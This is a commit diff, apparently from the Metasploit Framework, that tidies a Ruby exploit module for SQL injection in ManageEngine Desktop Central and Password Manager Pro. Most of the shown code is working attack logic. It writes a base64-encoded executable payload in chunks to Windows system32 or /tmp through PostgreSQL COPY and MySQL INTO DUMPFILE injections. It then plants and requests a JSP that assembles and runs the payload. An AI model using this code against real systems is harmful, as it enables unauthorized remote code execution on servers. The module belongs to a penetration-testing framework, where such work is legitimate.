Clean exploit, just a little

Author: jvazquez-r7

modules/exploits/multi/http/manageengine_dc_pmp_sqli.rb

@@ -159,9 +159,11 @@ def exploit
 
     jsp_name  = rand_text_alpha_lower(8) + ".jsp"
     fullpath = web_root + jsp_name
+    inject_exec(fullpath)
     register_file_for_cleanup(fullpath.sub('../',''))
 
-    inject_exec(jsp_name, fullpath)
+    print_status("#{peer} - Requesting #{jsp_name}")
+    send_request_raw({'uri' => normalize_uri(jsp_name)})
   end
 
   # Test for Password Manager Pro
@@ -443,9 +445,7 @@ def inject_sql(sqli_command, target = nil)
     end
    end
 
-  #
   # Generate the actual payload
-  #
   def generate_exe_payload
     opts = {:arch => @my_target.arch, :platform => @my_target.platform}
     payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
@@ -458,11 +458,8 @@ def generate_exe_payload
     Rex::Text.encode_base64(exe)
   end
 
-  #
-  # Uploads the payload in chunks and then calls the JSP that will assemble them
-  # (runs the actual exploit).
-  #
-  def inject_exec(jsp_name, fullpath)
+  # Uploads the payload in chunks
+  def inject_exec(fullpath)
     base64_exe = generate_exe_payload
     base64_exe_len = base64_exe.length
 
@@ -483,25 +480,22 @@ def inject_exec(jsp_name, fullpath)
     # The Windows path has to be escaped with 4 backslashes because ruby eats one
     # and the JSP eats the other.
     files = Array.new(chunks)
-    files.map! {
-      |file|
+    files.map! do |file|
       if @my_target['Platform'] == 'win'
         file = "C:\\\\windows\\\\system32\\\\" + rand_text_alpha(rand(8)+3)
       else
         # Assuming Linux, let's hope we can write to /tmp
         file = "/tmp/" + rand_text_alpha(rand(8)+3)
       end
-    }
+    end
 
-    print_status("#{peer} - Payload size is #{base64_exe_len}, injecting #{chunks}" +
-     " chunks in #{time} seconds")
+    print_status("#{peer} - Payload size is #{base64_exe_len}, injecting #{chunks} chunks in #{time} seconds")
 
     if @my_target['Database'] == 'postgresql'
       inject_sql("copy (select '#{base64_exe[copied,chunk_size]}') to '#{files[counter]}'")
     else
       # Assuming mysql
-      inject_sql("select '#{base64_exe[copied,chunk_size]}' from mysql.user into dumpfile" +
-       " '#{files[counter]}'")
+      inject_sql("select '#{base64_exe[copied,chunk_size]}' from mysql.user into dumpfile '#{files[counter]}'")
     end
     register_file_for_cleanup(files[counter])
     copied += chunk_size
@@ -513,12 +507,10 @@ def inject_exec(jsp_name, fullpath)
         chunk_size = base64_exe_len - copied
       end
       if @my_target['Database'] == 'postgresql'
-        inject_sql("copy (select '#{base64_exe[copied,chunk_size]}') to " +
-          "'#{files[counter]}'")
+        inject_sql("copy (select '#{base64_exe[copied,chunk_size]}') to '#{files[counter]}'")
       else
         # Assuming mysql
-        inject_sql("select '#{base64_exe[copied,chunk_size]}' from mysql.user into " +
-         "dumpfile '#{files[counter]}'")
+        inject_sql("select '#{base64_exe[copied,chunk_size]}' from mysql.user into dumpfile '#{files[counter]}'")
       end
       register_file_for_cleanup(files[counter])
       copied += chunk_size
@@ -527,15 +519,10 @@ def inject_exec(jsp_name, fullpath)
 
     jsp_encoded = generate_jsp_encoded(files)
     if @my_target['Database'] == 'postgresql'
-      inject_sql("copy (select convert_from(decode('#{jsp_encoded}','base64'),'utf8'))" +
-       " to '#{fullpath}'")
+      inject_sql("copy (select convert_from(decode('#{jsp_encoded}','base64'),'utf8')) to '#{fullpath}'")
     else
       inject_sql("select 0x#{jsp_encoded} from mysql.user into dumpfile '#{fullpath}'")
     end
-    print_status("#{peer} - Requesting #{jsp_name}")
-    send_request_raw({'uri' => normalize_uri(jsp_name)})
-
-    handler
   end
 
   def check_desktop_central_8(body)